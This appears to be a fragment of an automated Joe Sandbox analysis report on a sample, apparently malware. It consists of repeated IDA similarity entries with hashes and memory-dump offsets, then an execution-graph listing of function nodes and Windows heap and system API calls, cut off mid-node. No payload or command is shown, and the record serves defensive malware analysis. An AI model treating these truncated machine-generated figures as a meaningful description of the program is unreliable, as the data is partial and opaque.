                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8de0a8ac7519f492efe3c12a9b39a1bd3bcdc6eefa40058fcbe7c5365d68505b
                                              • Instruction ID: 6dd0da5e4f533d60528dcbb864b0c79d6a9b7742b95e3c46167b65e35a9f1e07
                                              • Opcode Fuzzy Hash: 8de0a8ac7519f492efe3c12a9b39a1bd3bcdc6eefa40058fcbe7c5365d68505b
                                              • Instruction Fuzzy Hash: D1D11430C2075ACACB00EFA4DA90A9DF771FF95304F60879AE40937665EB706AC5CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dd92f53c57596aac41c2a7ffde40a1c4b4a7745943d45234d52227a4fb97c631
                                              • Instruction ID: 20416393fb44134837f45cc86c1dc98109786db4991ac592a236c6d428a7d79b
                                              • Opcode Fuzzy Hash: dd92f53c57596aac41c2a7ffde40a1c4b4a7745943d45234d52227a4fb97c631
                                              • Instruction Fuzzy Hash: 10D11430C2075ACACB00EFA4DA90A9DF771FF95304F60879AE40937665EB706AC5CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a1ece8c5fbb2281bbec27ce0452c1fd648bec30c9c972c5fd316d4a5635152b
                                              • Instruction ID: 003e4a79122dc8c8861d76278f68dcf6ca56c3d67ad0c36785b1dea8ab732ff3
                                              • Opcode Fuzzy Hash: 8a1ece8c5fbb2281bbec27ce0452c1fd648bec30c9c972c5fd316d4a5635152b
                                              • Instruction Fuzzy Hash: B981F0B4E10219CFCB58CF99C5849AEFBF1FF89250F14915AE419AB720D334AA42CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71a07a994a57d7922cb3d66ba5c6f5e2528e1db36b3bbd41ae96edc74744a01c
                                              • Instruction ID: a7218cf2c62f3620865ae357dc179413d2e09f245ad6beec462b3ee755eabbf8
                                              • Opcode Fuzzy Hash: 71a07a994a57d7922cb3d66ba5c6f5e2528e1db36b3bbd41ae96edc74744a01c
                                              • Instruction Fuzzy Hash: 118102B5E10219CFCB58CF99C58599EFBF1FF89250F14916AD419AB320D334AA42CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e73912938917d3c074cf094bd9ad0a28c9455bb29687b1201d17265606f2993
                                              • Instruction ID: f666f4fbcad52fb23e7b1df87f29901270cf4d1459ea0e55d9071f1b1445703e
                                              • Opcode Fuzzy Hash: 6e73912938917d3c074cf094bd9ad0a28c9455bb29687b1201d17265606f2993
                                              • Instruction Fuzzy Hash: B76121B197570DDBEB50CF91E08A659FFBAFBCA301F24C595C489A7184DB384AA1CB04
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 751d3d6f2789625fb5356155ad4bc3a59ec36376c31c9785b3a9a4b7f6bf7673
                                              • Instruction ID: b2e1e7691eb961e70c3937dcb94f289a9293b539f5bf822e3cbe91f556a12e8b
                                              • Opcode Fuzzy Hash: 751d3d6f2789625fb5356155ad4bc3a59ec36376c31c9785b3a9a4b7f6bf7673
                                              • Instruction Fuzzy Hash: 726125B5E1120EDFDB14CFAAD4815AEFBB6BB89300F14D05AD429BB204D7389A41CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a363fea6759a1cd3dfe58f41f513de7d972e4a615e1506c557e30547859125dc
                                              • Instruction ID: dbd5e80c33ccd528eca4172a5d8a81f1448fd27489eda3d0c52785f6ac9c1318
                                              • Opcode Fuzzy Hash: a363fea6759a1cd3dfe58f41f513de7d972e4a615e1506c557e30547859125dc
                                              • Instruction Fuzzy Hash: 045148B6E1520EDFDB14CFA9D4815AEFBB6BF89300F14D066D419AB240D7389A41CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ba67fec10fdb7a6869fa33dfb5117a36d060076e7039fb13196206564d4ee37
                                              • Instruction ID: 85d5c339d3e9b4875ec7bbc020b8714e6523674f15d832da6d471f2f7800f691
                                              • Opcode Fuzzy Hash: 2ba67fec10fdb7a6869fa33dfb5117a36d060076e7039fb13196206564d4ee37
                                              • Instruction Fuzzy Hash: E05158B0E1524ADFDB08CFA6D4855AEFFF2EF89311F10942AE415A7254D7385A81CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e56441619411c90360ec1efc3f3225febe85c18e5e143862cf6a629f29e936de
                                              • Instruction ID: 3f705a7f1913817c3b880a468b11fd529539fb4650eaf80f164675a4a0933fed
                                              • Opcode Fuzzy Hash: e56441619411c90360ec1efc3f3225febe85c18e5e143862cf6a629f29e936de
                                              • Instruction Fuzzy Hash: CC5158B0E1520ACFDB18CFA6D4455EEFBF6EF89301F10942AE409A3254D7385A41CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ba5a03054dbaf91122e5c4eb1887d8af564749466ff826c5ab40d7abbe415d7
                                              • Instruction ID: 1a62c9acdf7dc6fcff4ab23a6af89d1a9c620f29dcb56439e1743f471758c576
                                              • Opcode Fuzzy Hash: 2ba5a03054dbaf91122e5c4eb1887d8af564749466ff826c5ab40d7abbe415d7
                                              • Instruction Fuzzy Hash: 0D512EB0E102198FDB14DFA9C5819AEFBF2BF89304F24C169D418AB315DB35A941CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 825f3377dbebf26cffdf478d2f4ed59e3e5656640ef8a4a1ac88afa1c76c716f
                                              • Instruction ID: dede3a7c4a4443dac6b7df671624938a44766fd2d4003b48f895400ebc0513a4
                                              • Opcode Fuzzy Hash: 825f3377dbebf26cffdf478d2f4ed59e3e5656640ef8a4a1ac88afa1c76c716f
                                              • Instruction Fuzzy Hash: D3514EB4E0021A8FDB14DFA9C5815AEFBF2BF89314F24C169D418A7315DB349942CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e435bf0c7e9e8b75b7596daad6bbc4d93217676df75330b9e647eb466c4c8d94
                                              • Instruction ID: 60534e6ab51447a07e912e96404768bbe6e9cf6c827e41fdf8615af1d883eb9b
                                              • Opcode Fuzzy Hash: e435bf0c7e9e8b75b7596daad6bbc4d93217676df75330b9e647eb466c4c8d94
                                              • Instruction Fuzzy Hash: 2B4106B1D1120ACFDB18CFAAD8825AEFBB6BF89210F14D16AD419A7204D7349641CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86493292dfd56342edc98b272308159d0b990aac25943115507f344a9dc3f0e1
                                              • Instruction ID: 3e02860c5d7adfed063065c6bee7ac0bdac972eeae2422791eb80414d203d2f3
                                              • Opcode Fuzzy Hash: 86493292dfd56342edc98b272308159d0b990aac25943115507f344a9dc3f0e1
                                              • Instruction Fuzzy Hash: 3041E8F1D1121ADBDB58CFAAD8825AEFBF6BF89310F14D12AD419A7200D7349641CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:31.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:4.4%
                                              Total number of Nodes:1846
                                              Total number of Limit Nodes:92
                                              execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 